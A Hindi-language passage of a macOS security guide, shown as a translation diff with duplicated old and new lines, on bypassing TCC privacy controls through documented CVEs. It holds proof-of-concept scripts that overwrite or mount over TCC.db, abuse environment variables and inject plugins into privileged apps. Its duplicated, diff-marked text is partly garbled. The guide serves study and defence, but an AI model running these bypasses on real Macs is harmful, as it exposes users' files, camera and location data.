डिफ़ॉल्ट रूप से **SSH के माध्यम से पहुँच "पूर्ण डिस्क एक्सेस"** के साथ होती थी। इसे अक्षम करने के लिए आपको इसे सूचीबद्ध करना होगा लेकिन अक्षम करना होगा (सूची से हटाने से उन विशेषाधिकारों को नहीं हटाया जाएगा):
डिफ़ॉल्ट रूप से **SSH के माध्यम से पहुँच "पूर्ण डिस्क एक्सेस"** के साथ होती है। इसे अक्षम करने के लिए आपको इसे सूचीबद्ध करना होगा लेकिन अक्षम करना होगा (सूची से हटाने से उन विशेषाधिकारों को नहीं हटाया जाएगा):
![](<../../../../../images/image (1077).png>)
यहाँ आप देख सकते हैं कि कुछ **मैलवेयर ने इस सुरक्षा को बायपास करने में कैसे सक्षम रहे हैं**:
यहाँ आप देख सकते हैं कि कुछ **मैलवेयर ने इस सुरक्षा को बायपास करने में कैसे सक्षम हुए**:
- [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
> [!CAUTION]
> ध्यान दें कि अब, SSH सक्षम करने के लिए आपको **पूर्ण डिस्क एक्सेस** की आवश्यकता है
> ध्यान दें कि अब, SSH सक्षम करने के लिए आपको **पूर्ण डिस्क एक्सेस** की आवश्यकता है
### हैंडल एक्सटेंशन - CVE-2022-26767
विशेषता **`com.apple.macl`** फाइलों को दी जाती है ताकि **किसी विशेष एप्लिकेशन को इसे पढ़ने की अनुमति मिल सके।** यह विशेषता तब सेट होती है जब **ड्रैग\&ड्रॉप** के माध्यम से एक फाइल को ऐप पर रखा जाता है, या जब उपयोगकर्ता **डबल-क्लिक** करता है एक फाइल को इसे **डिफ़ॉल्ट एप्लिकेशन** के साथ खोलने के लिए।
इसलिए, एक उपयोगकर्ता **एक दुर्भावनापूर्ण ऐप को पंजीकृत कर सकता है** ताकि सभी एक्सटेंशनों को संभाल सके और Launch Services को **कोई भी फाइल खोलने** के लिए कॉल कर सके (ताकि दुर्भावनापूर्ण फाइल को इसे पढ़ने की अनुमति मिल सके)।
इसलिए, एक उपयोगकर्ता **एक दुर्भावनापूर्ण ऐप को पंजीकृत कर सकता है** ताकि सभी एक्सटेंशनों को संभाल सके और Launch Services को **खोलने** के लिए कॉल कर सके (ताकि दुर्भावनापूर्ण फाइल को इसे पढ़ने की अनुमति मिल सके)।
### iCloud
@ -80,7 +80,7 @@ macos-apple-scripts.md
#### iTerm पर
Terminal, जिस पास FDA नहीं है, iTerm को कॉल कर सकता है, जिसके पास है, और इसका उपयोग क्रियाएँ करने के लिए कर सकता है:
Terminal, जिसे FDA नहीं है, iTerm को कॉल कर सकता है, जिसके पास यह है, और इसका उपयोग क्रियाएँ करने के लिए कर सकता है:
```applescript:iterm.script
tell application "iTerm"
activate
@ -98,7 +98,7 @@ osascript iterm.script
```
#### ओवर फ़ाइंडर
या यदि क ऐप फ़ाइंडर पर पहुंच रखता है, तो यह एक स्क्रिप्ट हो सकती है जैसे कि यह:
या यदि किसी ऐप को फ़ाइंडर पर पहुंच है, तो यह एक स्क्रिप्ट हो सकती है जैसे कि यह:
```applescript
set a_user to do shell script "logname"
tell application "Finder"
@ -108,14 +108,14 @@ set t to paragraphs of (do shell script "cat " & POSIX path of (copyFile as alia
end tell
do shell script "rm " & POSIX path of (copyFile as alias)
```
## ऐप व्यवहार द्वारा
## ऐप व्यवहार
### CVE-20209934 - TCC <a href="#c19b" id="c19b"></a>
यूजरलैंड **tccd daemon** **`HOME`** **env** वेरिएबल का उपयोग करके TCC उपयोगकर्ता डेटाबेस तक पहुँच रहा था: **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`**
यूजरलैंड **tccd डेमन** **`HOME`** **env** वेरिएबल का उपयोग करके TCC उपयोगकर्ताओं के डेटाबेस तक पहुँच रहा था: **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`**
[इस Stack Exchange पोस्ट](https://stackoverflow.com/questions/135688/setting-environment-variables-on-os-x/3756686#3756686) के अनुसार और क्योंकि TCC daemon वर्तमान उपयोगकर्ता के डोमेन के भीतर `launchd` के माध्यम से चल रहा है, इसे पास किए गए **सभी वातावरण वेरिएबल्स** को **नियंत्रित करना संभव है**।\
इसलिए, एक **हमलावर `$HOME` वातावरण** वेरिएबल को **`launchctl`** में एक **नियंत्रित** **डायरेक्टरी** की ओर इंगित करने के लिए सेट कर सकता है, **TCC** daemon को **रीस्टार्ट** कर सकता है, और फिर **TCC डेटाबेस को सीधे संशोधित** कर सकता है ताकि वह **हर उपलब्ध TCC अधिकार** प्राप्त कर सके बिना अंत उपयोगकर्ता को कभी भी संकेत दिए।\
[इस Stack Exchange पोस्ट](https://stackoverflow.com/questions/135688/setting-environment-variables-on-os-x/3756686#3756686) के अनुसार और क्योंकि TCC डेमन वर्तमान उपयोगकर्ता के डोमेन के भीतर `launchd` के माध्यम से चल रहा है, इसे पास किए गए **सभी वातावरण वेरिएबल्स** को **नियंत्रित** करना संभव है।\
इस प्रकार, एक **हमलावर `$HOME` वातावरण** वेरिएबल को **`launchctl`** में एक **नियंत्रित** **डायरेक्टरी** की ओर सेट कर सकता है, **TCC** डेमन को **रीस्टार्ट** कर सकता है, और फिर **TCC डेटाबेस को सीधे संशोधित** कर सकता है ताकि वह **हर उपलब्ध TCC अधिकार** प्राप्त कर सके बिना अंत उपयोगकर्ता को कभी भी संकेत दिए।\
PoC:
```bash
# reset database just in case (no cheating!)
@ -153,25 +153,25 @@ $> ls ~/Documents
बाइनरी `/usr/libexec/lsd` जिसमें लाइब्रेरी `libsecurity_translocate` थी, के पास `com.apple.private.nullfs_allow` का अधिकार था जिससे इसे **nullfs** माउंट बनाने की अनुमति मिली और इसके पास **`kTCCServiceSystemPolicyAllFiles`** के साथ `com.apple.private.tcc.allow` का अधिकार था जिससे हर फ़ाइल तक पहुंचने की अनुमति मिली।
"Library" में क्वारंटाइन विशेषता जोड़ना संभव था, **`com.apple.security.translocation`** XPC सेवा को कॉल करना और फिर यह Library को **`$TMPDIR/AppTranslocation/d/d/Library`** पर मैप करेगा जहां Library के अंदर सभी दस्तावेज़ों तक **पहुँच** की जा सकती है
"Library" पर क्वारंटाइन विशेषता जोड़ना संभव था, **`com.apple.security.translocation`** XPC सेवा को कॉल करना और फिर यह Library को **`$TMPDIR/AppTranslocation/d/d/Library`** पर मैप करेगा जहां Library के अंदर सभी दस्तावेज़ों तक **पहुँच** की जा सकती थी
### CVE-2023-38571 - म्यूजिक और टीवी <a href="#cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv" id="cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv"></a>
**`Music`** में एक दिलचस्प विशेषता है: जब यह चल रहा होता है, यह फ़ाइलों को **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** में उपयोगकर्ता की "मीडिया लाइब्रेरी" में **आयात** करेगा। इसके अलावा, यह कुछ इस तरह कॉल करता है: **`rename(a, b);`** जहां `a` और `b` हैं:
**`Music`** में एक दिलचस्प विशेषता है: जब यह चल रहा होता है, यह **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** में गिराए गए फ़ाइलों को उपयोगकर्ता की "मीडिया लाइब्रेरी" में **आयात** करेगा। इसके अलावा, यह कुछ इस तरह कॉल करता है: **`rename(a, b);`** जहां `a` और `b` हैं:
- `a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"`
- `b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3`
- `b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3"`
यह **`rename(a, b);`** व्यवहार एक **रेस कंडीशन** के प्रति संवेदनशील है, क्योंकि यह संभव है कि `Automatically Add to Music.localized` फ़ोल्डर के अंदर एक नकली **TCC.db** फ़ाइल डाली जाए और फिर जब नया फ़ोल्डर(b) बनाया जाए तो फ़ाइल को कॉपी करें, उसे हटा दें, और इसे **`~/Library/Application Support/com.apple.TCC`** पर इंगित करें।
### SQLITE_SQLLOG_DIR - CVE-2023-32422
यदि **`SQLITE_SQLLOG_DIR="path/folder"`** है, तो इसका मतलब है कि **कोई भी खुला db उस पथ पर कॉपी किया जाता है**। इस CVE में इस नियंत्रण का दुरुपयोग किया गया था ताकि **SQLite डेटाबेस** के अंदर **लिखा** जा सके जो एक प्रक्रिया द्वारा FDA TCC डेटाबेस के साथ **खुला** जाएगा, और फिर **`SQLITE_SQLLOG_DIR`** का दुरुपयोग एक **symlink नाम में** किया गया ताकि जब वह डेटाबेस **खुला** हो, उपयोगकर्ता **TCC.db को ओवरराइट** किया जा।\
यदि **`SQLITE_SQLLOG_DIR="path/folder"`** है तो इसका मतलब है कि **कोई भी खुला db उस पथ पर कॉपी किया जाता है**। इस CVE में इस नियंत्रण का दुरुपयोग किया गया था ताकि **एक SQLite डेटाबेस के अंदर लिखा जा सके** जो **FDA TCC डेटाबेस के साथ एक प्रक्रिया द्वारा खोला जाएगा**, और फिर **`SQLITE_SQLLOG_DIR`** का दुरुपयोग **फाइलनाम में एक सिमलिंक** के साथ किया गया ताकि जब वह डेटाबेस **खुला** हो, उपयोगकर्ता **TCC.db को ओवरराइट** किया जा सके।\
**अधिक जानकारी** [**लेख में**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **और**[ **बातचीत में**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s)।
### **SQLITE_AUTO_TRACE**
यदि पर्यावरण चर **`SQLITE_AUTO_TRACE`** सेट किया गया है, तो लाइब्रेरी **`libsqlite3.dylib`** सभी SQL क्वेरीज़ को **लॉगिंग** करना शुरू कर देगी। कई अनुप्रयोगों ने इस लाइब्रेरी का उपयोग किया, इसलिए उनके सभी SQLite क्वेरीज़ को लॉग करना संभव था।
यदि पर्यावरण चर **`SQLITE_AUTO_TRACE`** सेट किया गया है, तो लाइब्रेरी **`libsqlite3.dylib`** सभी SQL क्वेरीज़ को **लॉगिंग** करना शुरू कर देगी। कई अनुप्रयोगों ने इस लाइब्रेरी का उपयोग किया, इसलिए यह सभी SQLite क्वेरीज़ को लॉग करना संभव था।
कई Apple अनुप्रयोगों ने TCC संरक्षित जानकारी तक पहुंचने के लिए इस लाइब्रेरी का उपयोग किया।
```bash
@ -182,13 +182,13 @@ launchctl setenv SQLITE_AUTO_TRACE 1
यह **env variable `Metal` framework द्वारा उपयोग किया जाता है** जो विभिन्न कार्यक्रमों पर निर्भरता है, विशेष रूप से `Music`, जिसमें FDA है।
निम्नलिखित सेट करें: `MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"`। यदि `path` एक मान्य निर्देशिका है, तो बग सक्रिय होगा और हम `fs_usage` का उपयोग करके देख सकते हैं कि कार्यक्रम में क्या हो रहा है:
निम्नलिखित सेट करें: `MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"`। यदि `path` एक मान्य निर्देशिका है, तो बग ट्रिगर होगा और हम `fs_usage` का उपयोग करके देख सकते हैं कि कार्यक्रम में क्या हो रहा है:
- एक फ़ाइल `open()` की जाएगी, जिसका नाम `path/.dat.nosyncXXXX.XXXXXX` होगा (X यादृच्छिक है)
- एक या अधिक `write()` फ़ाइल में सामग्री लिखेंगे (हम इसे नियंत्रित नहीं करते)
- एक या अधिक `write()` फ़ाइल में सामग्री लिखेंगे (हम इसका नियंत्रण नहीं करते)
- `path/.dat.nosyncXXXX.XXXXXX` को `path/name` में `renamed()` किया जाएगा
यह एक अस्थायी फ़ाइल लेखन है, जिसके बाद एक **`rename(old, new)`** **जो सुरक्षित नहीं है।**
यह एक अस्थायी फ़ाइल लेखन है, सके बाद एक **`rename(old, new)`** **जो सुरक्षित नहीं है।**
यह सुरक्षित नहीं है क्योंकि इसे **पुराने और नए पथों को अलग-अलग हल करना होगा**, जो कुछ समय ले सकता है और एक Race Condition के प्रति संवेदनशील हो सकता है। अधिक जानकारी के लिए आप `xnu` फ़ंक्शन `renameat_internal()` की जांच कर सकते हैं।
@ -197,32 +197,32 @@ launchctl setenv SQLITE_AUTO_TRACE 1
>
> यदि नाम बदलने का फ़ोल्डर आप नियंत्रित करते हैं, जबकि आपने स्रोत फ़ाइल को संशोधित किया है या इसके लिए एक FD है, तो आप गंतव्य फ़ाइल (या फ़ोल्डर) को एक symlink की ओर इंगित करने के लिए बदल सकते हैं, ताकि आप जब चाहें लिख सकें।
यह CVE में हमला था: उदाहरण के लिए, उपयोगकर्ता के `TCC.db` को अधिलेखित करने के लिए, हम कर सकते हैं:
यह CVE में हमला था: उदाहरण के लिए, उपयोगकर्ता के `TCC.db` को ओवरराइट करने के लिए, हम कर सकते हैं:
- `/Users/hacker/ourlink` बनाएं जो `/Users/hacker/Library/Application Support/com.apple.TCC/` की ओर इंगित करता है
- निर्देशिका `/Users/hacker/tmp/` बनाएं
- सेट करें `MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db`
- इस env var के साथ `Music` चलाकर बग को सक्रिय करें
- इस env var के साथ `Music` चलाकर बग को ट्रिगर करें
- `/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX` का `open()` पकड़ें (X यादृच्छिक है)
- यहाँ हम इस फ़ाइल को लेखन के लिए भी `open()` करते हैं, और फ़ाइल डिस्क्रिप्टर को पकड़ कर रखते हैं
- `/Users/hacker/tmp` को `/Users/hacker/ourlink` के साथ **एक लूप में** परमाणु रूप से स्विच करें
- हम ऐसा करते हैं ताकि हमारी सफल होने की संभावनाएँ अधिकतम हो सकें क्योंकि दौड़ की खिड़की काफी संकीर्ण है, लेकिन दौड़ हारने का नुकसान नगण्य है
- हम ऐसा करते हैं ताकि हमारी सफल होने की संभावनाएँ अधिकतम हो सकें क्योंकि रेस विंडो काफी संकीर्ण है, लेकिन रेस हारने का नुकसान नगण्य है
- थोड़ा इंतजार करें
- परीक्षण करें कि क्या हमें भाग्यशाली मिला
- जांचें कि क्या हमें भाग्यशाली मिला
- यदि नहीं, तो फिर से शीर्ष से चलाएं
अधिक जानकारी [https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html](https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html) में है
अधिक जानकारी के लिए [https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html](https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html)
> [!CAUTION]
> अब, यदि आप env variable `MTL_DUMP_PIPELINES_TO_JSON_FILE` का उपयोग करने की कोशिश करते हैं तो ऐप्स लॉन्च नहीं होंगे
> अब, यदि आप env variable `MTL_DUMP_PIPELINES_TO_JSON_FILE` का उपयोग करने की कोशिश करते हैं, तो ऐप्स लॉन्च नहीं होंगे
### Apple Remote Desktop
रूट के रूप में आप इस सेवा को सक्षम कर सकते हैं और **ARD एजेंट को पूर्ण डिस्क एक्सेस** होगा जिसे फिर एक उपयोगकर्ता द्वारा एक नया **TCC उपयोगकर्ता डेटाबेस** कॉपी करने के लिए दुरुपयोग किया जा सकता है।
रूट के रूप में आप इस सेवा को सक्षम कर सकते हैं और **ARD एजेंट को पूर्ण डिस्क एक्सेस** होगा जिसे फिर एक उपयोगकर्ता द्वारा एक न **TCC उपयोगकर्ता डेटाबेस** की कॉपी करने के लिए दुरुपयोग किया जा सकता है।
## By **NFSHomeDirectory**
TCC उपयोगकर्ता के HOME फ़ोल्डर में एक डेटाबेस का उपयोग करता है ताकि उपयोगकर्ता के लिए विशिष्ट संसाधनों तक पहुँच को नियंत्रित किया जा सके **$HOME/Library/Application Support/com.apple.TCC/TCC.db** में।\
TCC उपयोगकर्ता के HOME फ़ोल्डर में एक डेटाबेस का उपयोग करता है ताकि उपयोगकर्ता के लिए विशिष्ट संसाधनों तक पहुँच को नियंत्रित किया जा सके **$HOME/Library/Application Support/com.apple.TCC/TCC.db**।\
इसलिए, यदि उपयोगकर्ता $HOME env variable को एक **विभिन्न फ़ोल्डर** की ओर इंगित करने के लिए TCC को पुनरारंभ करने में सफल होता है, तो उपयोगकर्ता **/Library/Application Support/com.apple.TCC/TCC.db** में एक नया TCC डेटाबेस बना सकता है और TCC को किसी भी ऐप को कोई भी TCC अनुमति देने के लिए धोखा दे सकता है।
> [!TIP]
@ -244,9 +244,9 @@ TCC उपयोगकर्ता के HOME फ़ोल्डर में
6. उपयोगकर्ता के _tccd_ को रोकें और प्रक्रिया को पुनरारंभ करें।
दूसरे POC ने **`/usr/libexec/configd`** का उपयोग किया जिसमें `com.apple.private.tcc.allow` था जिसका मान `kTCCServiceSystemPolicySysAdminFiles` था।\
यह संभव था **`configd`** को **`-t`** विकल्प के साथ चलाने के लिए, एक हमलावर एक **कस्टम बंडल लोड करने** के लिए निर्दिष्ट कर सकता था। इसलिए, शोषण **`dsexport`** और **`dsimport`** विधि को उपयोगकर्ता के होम डायरेक्टरी को बदलने के लिए **`configd` कोड इंजेक्शन** के साथ **बदलता है**
यह संभव था **`configd`** को **`-t`** विकल्प के साथ चलाने के लिए, एक हमलावर एक **कस्टम बंडल लोड करने** के लिए निर्दिष्ट कर सकता था। इसलिए, यह शोषण **उपयोगकर्ता के होम डायरेक्टरी को बदलने के लिए** **`dsexport`** और **`dsimport`** विधि को **`configd` कोड इंजेक्शन** के साथ **बदलता** है।
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/) की जांच करें।
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/) देखें।
## By process injection
@ -257,21 +257,21 @@ TCC उपयोगकर्ता के HOME फ़ोल्डर में
{{#endref}}
इसके अलावा, TCC को बायपास करने के लिए सबसे सामान्य प्रक्रिया इंजेक्शन **प्लगइन्स (लोड लाइब्रेरी)** के माध्यम से पाया गया है।\
प्लगइन्स अतिरिक्त कोड होते हैं जो आमतौर पर लाइब्रेरी या plist के रूप में होते हैं, जिन्हें **मुख्य एप्लिकेशन द्वारा लोड किया जाएगा** और इसके संदर्भ में निष्पादित किया जाएगा। इसलिए, यदि मुख्य एप्लिकेशन को TCC प्रतिबंधित फ़ाइलों (अनुमतियों या अधिकारों के माध्यम से) तक पहुँच प्राप्त है, तो **कस्टम कोड को भी यह प्राप्त होगा**
प्लगइन्स अतिरिक्त कोड होते हैं जो आमतौर पर लाइब्रेरी या plist के रूप में होते हैं, जिन्हें **मुख्य एप्लिकेशन द्वारा लोड किया जाएगा** और इसके संदर्भ में निष्पादित किया जाएगा। इसलिए, यदि मुख्य एप्लिकेशन को TCC प्रतिबंधित फ़ाइलों तक पहुँच प्राप्त है (अनुमतियों या अधिकारों के माध्यम से), तो **कस्टम कोड को भी यह प्राप्त होगा**
### CVE-2020-27937 - Directory Utility
एप्लिकेशन `/System/Library/CoreServices/Applications/Directory Utility.app` में **`kTCCServiceSystemPolicySysAdminFiles`** का अधिकार था, लोड किए गए प्लगइन्स में **`.daplug`** एक्सटेंशन था और **कठोर** रनटाइम नहीं था।
एप्लिकेशन `/System/Library/CoreServices/Applications/Directory Utility.app` में विशेषाधिकार **`kTCCServiceSystemPolicySysAdminFiles`** था, लोड किए गए प्लगइन्स के साथ **`.daplug`** एक्सटेंशन और **सुरक्षित** रनटाइम नहीं था।
इस CVE को हथियारबंद करने के लिए, **`NFSHomeDirectory`** को **बदल दिया गया** (पिछले धिकार का दुरुपयोग करते हुए) ताकि उपयोगकर्ता के TCC डेटाबेस को **कब्जा** किया जा सके और TCC को बायपास किया जा सके।
इस CVE को हथियारबंद करने के लिए, **`NFSHomeDirectory`** को **बदल दिया गया** (पिछले विशेषाधिकार का दुरुपयोग करते हुए) ताकि उपयोगकर्ता के TCC डेटाबेस को **कब्जा** किया जा सके और TCC को बायपास किया जा सके।
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://wojciechregula.blog/post/change-home-directory-and-bypass-tcc-aka-cve-2020-27937/) की जांच करें।
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://wojciechregula.blog/post/change-home-directory-and-bypass-tcc-aka-cve-2020-27937/) देखें।
### CVE-2020-29621 - Coreaudiod
बाइनरी **`/usr/sbin/coreaudiod`** में धिकार `com.apple.security.cs.disable-library-validation` और `com.apple.private.tcc.manager` थे। पहला **कोड इंजेक्शन** की अनुमति देता है और दूसरा **TCC** को प्रबंधित करने की अनुमति देता है।
बाइनरी **`/usr/sbin/coreaudiod`** में विशेषाधिकार `com.apple.security.cs.disable-library-validation` और `com.apple.private.tcc.manager` थे। पहला **कोड इंजेक्शन** की अनुमति देता है और दूसरा इसे **TCC प्रबंधित** करने की अनुमति देता है।
इस बाइनरी ने **तीसरे पक्ष के प्लगइन्स** को `/Library/Audio/Plug-Ins/HAL` फ़ोल्डर से लोड करने की अनुमति दी। इसलिए, यह संभव था कि **एक प्लगइन लोड करें और इस PoC के साथ TCC अनुमतियों का दुरुपयोग करें:**
इस बाइनरी ने **तीसरे पक्ष के प्लगइन्स** को फ़ोल्डर `/Library/Audio/Plug-Ins/HAL` से लोड करने की अनुमति दी। इसलिए, यह संभव था कि **एक प्लगइन लोड करें और इस PoC के साथ TCC अनुमतियों का दुरुपयोग करें:**
```objectivec
#import <Foundation/Foundation.h>
#import <Security/Security.h>
@ -302,7 +302,7 @@ For more info check the [**original report**](https://wojciechregula.blog/post/p
### Device Abstraction Layer (DAL) Plug-Ins
सिस्टम एप्लिकेशन जो Core Media I/O के माध्यम से कैमरा स्ट्रीम खोलते हैं (**`kTCCServiceCamera`** के साथ ऐप्स) **इन प्लगइन्स को लोड करते हैं** जो `/Library/CoreMediaIO/Plug-Ins/DAL` में स्थित हैं (SIP प्रतिबंधित नहीं)।
सिस्टम एप्लिकेशन जो Core Media I/O के माध्यम से कैमरा स्ट्रीम खोलते हैं (**`kTCCServiceCamera`** के साथ ऐप्स) **इन प्लग-इन्स को लोड करते हैं** जो `/Library/CoreMediaIO/Plug-Ins/DAL` में स्थित हैं (SIP प्रतिबंधित नहीं)।
वहाँ एक सामान्य **कंस्ट्रक्टर** के साथ एक लाइब्रेरी को स्टोर करना **कोड इंजेक्ट** करने के लिए काम करेगा।
@ -344,9 +344,9 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
### CVE-2023-26818 - Telegram
Telegram में **`com.apple.security.cs.allow-dyld-environment-variables`** और **`com.apple.security.cs.disable-library-validation`** अधिकार थे, इसलिए इसे **इसके अनुमतियों तक पहुंच प्राप्त करने** के लिए दुरुपयोग करना संभव था, जैसे कैमरे के साथ रिकॉर्डिंग करना। आप [**लिखाई में पेलोड पा सकते हैं**](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)।
Telegram में **`com.apple.security.cs.allow-dyld-environment-variables`** और **`com.apple.security.cs.disable-library-validation`** अधिकार थे, इसलिए इसे **इसके अनुमतियों तक पहुंच प्राप्त करने** के लिए दुरुपयोग करना संभव था, जैसे कैमरे के साथ रिकॉर्डिंग करना। आप [**लिखाई में पेलोड ढूंढ सकते हैं**](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)।
ध्यान दें कि env वेरिएबल का उपयोग करके एक लाइब्रेरी लोड करने के लिए एक **कस्टम plist** बनाई गई थी ताकि इस लाइब्रेरी को इंजेक्ट किया जा सके और **`launchctl`** का उपयोग इसे लॉन्च करने के लिए किया गया:
ध्यान दें कि एक लाइब्रेरी लोड करने के लिए env वेरिएबल का उपयोग कैसे करें, एक **कस्टम plist** बनाई गई थी ताकि इस लाइब्रेरी को इंजेक्ट किया जा सके और **`launchctl`** का उपयोग इसे लॉन्च करने के लिए किया गया:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -380,11 +380,11 @@ launchctl load com.telegram.launcher.plist
यह संभव है कि **`open`** को सैंडबॉक्स में रहते हुए भी आमंत्रित किया जा सके
### टर्मिनल स्क्रिप्ट
### टर्मिनल स्क्रिप्ट्स
यह तकनीकी लोगों द्वारा उपयोग किए जाने वाले कंप्यूटरों में टर्मिनल को **पूर्ण डिस्क एक्सेस (FDA)** देना आम है। और इसके साथ **`.terminal`** स्क्रिप्ट को आमंत्रित करना संभव है।
यह तकनीकी लोगों द्वारा उपयोग किए जाने वाले कंप्यूटरों में टर्मिनल को **पूर्ण डिस्क एक्सेस (FDA)** देना आम है। और इसके साथ **`.terminal`** स्क्रिप्ट्स को आमंत्रित करना संभव है।
**`.terminal`** स्क्रिप्ट plist फ़ाइलें होती हैं जैसे कि यह एक जिसमें **`CommandString`** कुंजी में निष्पादित करने के लिए आदेश होता है:
**`.terminal`** स्क्रिप्ट्स plist फ़ाइलें हैं जैसे कि यह एक जिसमें **`CommandString`** कुंजी में निष्पादित करने के लिए आदेश होता है:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
@ -418,7 +418,7 @@ exploit_location]; task.standardOutput = pipe;
### CVE-2020-9771 - mount_apfs TCC बायपास और विशेषाधिकार वृद्धि
**कोई भी उपयोगकर्ता** (यहां तक कि बिना विशेषाधिकार वाले) एक टाइम मशीन स्नैपशॉट बना और माउंट कर सकता है और उस स्नैपशॉट के **सभी फ़ाइलों** तक पहुंच सकता है।\
आवश्यक **केवल विशेषाधिकार** यह है कि उपयोग किए जाने वाले एप्लिकेशन (जैसे `Terminal`) को **पूर्ण डिस्क एक्सेस** (FDA) एक्सेस (`kTCCServiceSystemPolicyAllfiles`) प्राप्त होना चाहिए, जिसे एक व्यवस्थापक द्वारा अनुमोदित किया जाना चाहिए।
आवश्यक **केवल विशेषाधिकार** यह है कि उपयोग किए जाने वाले एप्लिकेशन (जैसे `Terminal`) को **पूर्ण डिस्क एक्सेस** (FDA) एक्सेस (`kTCCServiceSystemPolicyAllfiles`) होना चाहिए, जिसे एक व्यवस्थापक द्वारा प्रदान किया जाना चाहिए।
```bash
# Create snapshot
tmutil localsnapshot
@ -442,7 +442,7 @@ ls /tmp/snap/Users/admin_user # This will work
### CVE-2021-1784 & CVE-2021-30808 - TCC फ़ाइल पर माउंट करें
यहां तक कि अगर TCC DB फ़ाइल सुरक्षित है, तो **निर्देशिका पर एक नया TCC.db फ़ाइल माउंट करना संभव था:**
यहां तक कि अगर TCC DB फ़ाइल सुरक्षित है, तो एक नया TCC.db फ़ाइल **निर्देशिका पर माउंट करना** संभव था:
```bash
# CVE-2021-1784
## Mount over Library/Application\ Support/com.apple.TCC
@ -463,13 +463,13 @@ os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
```
Check the **full exploit** in the [**original writeup**](https://theevilbit.github.io/posts/cve-2021-30808/).
चेक करें **पूर्ण एक्सप्लॉइट** [**मूल लेख**](https://theevilbit.github.io/posts/cve-2021-30808/) में।
### CVE-2024-40855
जैसा कि [original writeup](https://www.kandji.io/blog/macos-audit-story-part2) में समझाया गया है, इस CVE ने `diskarbitrationd` का दुरुपयोग किया।
जैसा कि [मूल लेख](https://www.kandji.io/blog/macos-audit-story-part2) में समझाया गया है, इस CVE ने `diskarbitrationd` का दुरुपयोग किया।
सार्वजनिक `DiskArbitration` फ्रेमवर्क से `DADiskMountWithArgumentsCommon` फ़ंक्शन सुरक्षा जांचें करता है। हालाँकि, इसे `diskarbitrationd` को सीधे कॉल करके बायपास करना संभव है और इसलिए पथ में `../` तत्वों और सिमलिंक्स का उपयोग करना संभव है
सार्वजनिक `DiskArbitration` फ्रेमवर्क से `DADiskMountWithArgumentsCommon` फ़ंक्शन सुरक्षा जांचें करता है। हालाँकि, इसे बायपास करना संभव है `diskarbitrationd` को सीधे कॉल करके और इसलिए पथ में `../` तत्वों और सिमलिंक्स का उपयोग करके
इसने एक हमलावर को किसी भी स्थान पर मनमाने माउंट करने की अनुमति दी, जिसमें TCC डेटाबेस पर `diskarbitrationd` के अधिकार `com.apple.private.security.storage-exempt.heritable` के कारण शामिल है।
@ -477,34 +477,34 @@ Check the **full exploit** in the [**original writeup**](https://theevilbit.gith
उपकरण **`/usr/sbin/asr`** ने पूरे डिस्क को कॉपी करने और TCC सुरक्षा को बायपास करते हुए इसे किसी अन्य स्थान पर माउंट करने की अनुमति दी।
### Location Services
### स्थान सेवाएँ
**`/var/db/locationd/clients.plist`** में एक तीसरा TCC डेटाबेस है जो उन क्लाइंट्स को इंगित करता है जिन्हें **स्थान सेवाओं** तक **पहुँचने** की अनुमति है।\
फोल्डर **`/var/db/locationd/` DMG माउंटिंग से सुरक्षित नहीं था** इसलिए यह संभव था कि हम अपनी plist को माउंट कर सकें
फोल्डर **`/var/db/locationd/` DMG माउंटिंग से सुरक्षित नहीं था** इसलिए यह हमारे अपने plist को माउंट करना संभव था
## By startup apps
## स्टार्टअप ऐप्स द्वारा
{{#ref}}
../../../../macos-auto-start-locations.md
{{#endref}}
## By grep
## grep द्वारा
कई अवसरों पर फ़ाइलें संवेदनशील जानकारी जैसे ईमेल, फोन नंबर, संदेश... को गैर-सुरक्षित स्थानों में संग्रहीत करेंगी (जो Apple में एक कमजोरियों के रूप में गिनी जाती है)।
